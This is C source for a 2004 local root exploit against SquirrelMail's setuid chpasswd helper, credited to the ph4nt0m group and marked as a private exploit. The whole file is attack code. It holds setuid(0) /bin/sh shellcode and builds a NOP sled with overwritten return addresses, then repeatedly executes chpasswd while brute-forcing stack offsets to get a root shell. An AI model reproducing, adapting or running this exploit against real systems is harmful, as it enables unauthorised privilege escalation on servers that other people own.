/* ** PST_chpasswd_exp-v_b.c: ** ** Squirrelmail chpasswd local root bruteforce exploit ** Author: ** Bytes<Bytes[at]ph4nt0m.net> || <Bytes[at]ph4nt0m.org> ** http://www.ph4nt0m.net/ ** Notice: ** v_b: Local bruteforce version ** v_R: remote bruteforce version ** ** ** Greatze: #ph4nt0m,#music@0x557 ** All PST member,Grip2,Airsupply,Jambalaya,Ann,Paul,Happy... ** Thax: My GF(Luz),Oyxin,Winewind,Envymask,Eong,luoluo,GoGo(f0r ever)... ** ** ** -=-=-=-=-=-=-=-=-=-= !!![+PH4NT0M TEAM PRIVATE EXPLOIT+]!!! =-=-=-=-=-=-=-=-=-=- ** ** Date: 2004-04 # DO NOT DISTRIBUTE # ** ** You Must get account belong to Webmaster ,www or other webserver groups. ** */ #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <sys/wait.h> #define NOP 0x90 #define Fuckpr0 "./chpasswd" /* you need modify it by yourself */ #define LOOP 2000 /* loop of bruteforce */ /* setuid(0) shellcode by by Matias Sedalo 3x ^_^ */ char shellcode[] ="\x31\xdb\x53\x8d\x43\x17\xcd\x80\x99\x68\x6e\x2f\x73\x68\x68" "\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; unsigned long get_esp() { __asm__ ("movl %esp,%eax"); } void *M_malloc(size_t size){ register void *value; value = malloc(size); if(value == NULL){ printf("ERROR:virtual memory exhausted...\n"); exit(-1); } return value; } int main(void){ unsigned long ret_addr; int i,j=0,offset=2,status; char *buf1,*buf2; pid_t pid; ret_addr = get_esp() - strlen(Fuckpr0) - strlen(shellcode); printf("\t-------------------------------------------------------\n"); printf("\t Squirrelmail chpasswd local root bruteforce exploit \n"); printf("\t code By Bytes<Bytes[at]ph4nt0m.org> 2004 \n"); printf("\t http://www.ph4nt0m.net \n"); printf("\t#######################################################\n"); sleep(1); printf("[+] Bruteforce......\n\n"); sleep(2); buf1 = (char *)M_malloc(150); buf2 = (char *)M_malloc(600); while(j <= LOOP){ if((pid = fork()) == 0){ memset(buf2,0x90,sizeof(buf2) - strlen(shellcode) - 8); memcpy(buf2 + sizeof(buf2) - strlen(shellcode) - 8,shellcode,sizeof(shellcode)); for(i=0; i < 150; i+=4){ *((unsigned long *)(buf1+i)) = ret_addr; } printf("buf1 = %s\n",buf1); execl(Fuckpr0,"chpasswd",buf1,buf2,0); } wait(&status); printf("[-] Signal: #%i\n", status); if(WIFEXITED(status) != 0 ) { printf("[=] Step.%i: 0x%x\n[~] Exiting...\n",(j/2),ret_addr); exit(1); }else{ ret_addr += offset; j += offset; printf("[=] Offset:%d Use ret:0x%x\n",j, ret_addr); } } free(buf1); free(buf2); return 1; }
